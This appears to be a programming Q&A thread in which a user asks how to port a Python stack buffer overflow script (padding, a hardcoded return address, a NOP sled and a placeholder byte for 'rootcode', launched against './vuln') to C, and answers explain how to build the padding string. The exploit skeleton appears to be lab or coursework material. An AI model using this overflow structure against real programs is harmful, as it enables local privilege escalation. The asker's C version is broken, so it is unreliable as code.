# Converting Python program to C: How can I multiply a character by a specified value and store it into a variable?

Tags: python, c, type-conversion, buffer-overflow

in need of general help with converting a small buffer overflow script in Python to C. It's a bit of hack job and I am struggling to get the data types right. I can compile everything with only a single warning: "***initialization makes pointer from integer without a cast*** - **char *buff = ("%0*i", 252, 'A');**"
This line is supposed to give the variable buff the value of 252 'A' characters.

I know that changing the data type can fix this, but the rest of the program relies on overflow being a pointer **char ***.
If anyone has any tips for me regarding any parts of the program they would be greatly appreciated.

cheers, Shiv

ORIGINAL Python:

```
stack_addr = 0xbffff1d0
rootcode = "\x31"
def conv(num):
    return struct.pack("<I",num)
buff = "A" * 172 
buff += conv(stack_addr) 
buff += "\x90" * 30   
buff += rootcode  
buff += "A" * 22  
print "targetting vulnerable program"
call(["./vuln", buff])
```

Converted C code:

```
//endianess convertion
int conv(int stack_addr)
{
    (stack_addr>>8) | (stack_addr<<8);
    return(0);
}

int main(int argc, char *argv[])
{
    int stack_addr = 0xbffff1d0;
    int rootcode = *"\x31" 
    char *buff = ("%0*i", 252, 'A'); //give buff the value of 252 'A's
    buff += conv(stack_addr); //endian conversion
    buff += ("%0*i", 30, '\x90'); //append buff variable with 30 '\x90' 
    buff = buff + rootcode; //append buff with value of rootcode variable
    buff += ("%0*i", 22, 'A'); //append buff with 22 'A's
}
```

Comment: Maybe if you explained what this line is supposed to accomplish, someone can help you with *how* to do it correctly.

Comment: I am pretty sure that ("%0*i", 252, 'A') is not doing what you think it is doing ... the comma operator will just return 'A' for that ...

see https://www.geeksforgeeks.org/comna-in-c-and-c/

Comment: Also your endian-ness conversion is incorrect

Comment: @ScottHunter edited

Answer (score 0):

The easiest way it to write a string with the needed number of characters manually. Use the copy-paste feature of your favourite text editor.

```
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
```

You can also build it from individual characters, using a for-loop, as described below. However, you can skip the part with building a long string, and append individual characters directly to the final string. This can be done in two ways: using `strcat` and without using `strcat`. The first way is a little cleaner:

```
char buff[400] = ""; // note: this should be an array, not a pointer!
// the array should be big enough to hold the final string; 400 seems enough
for (int i = 0; i < 252; i++)
    strcat(buff, "A"); // this part appends one string of length 1
```

The function `strcat` is inefficient; it calculates the length of the string each time you append the string `"A"` to it. You don't need speed, but if you ever decide to write it efficiently, don't use `strcat`, and append individual `char` (bytes) to the array using core C language:

```
char buff[400]; // note: this should be an array, not a pointer!
int pos = 0; // position at which to write data
for (int i = 0; i < 252; i++)
    buff[pos++] = 'A'; // this part appends one char 'A'; note single quotes
...
buff[pos++] = '\0'; // don't forget to terminate the string!
```

Comment: great, thanks for clearing that up. However I am receiving a warning of assignment makes integer from pointer on the line buff[pos++] = 'A';      Any ideas?

Comment: `char buf[400] = {0}; memset(&buff, 'A', 252);` is the efficient way to do this.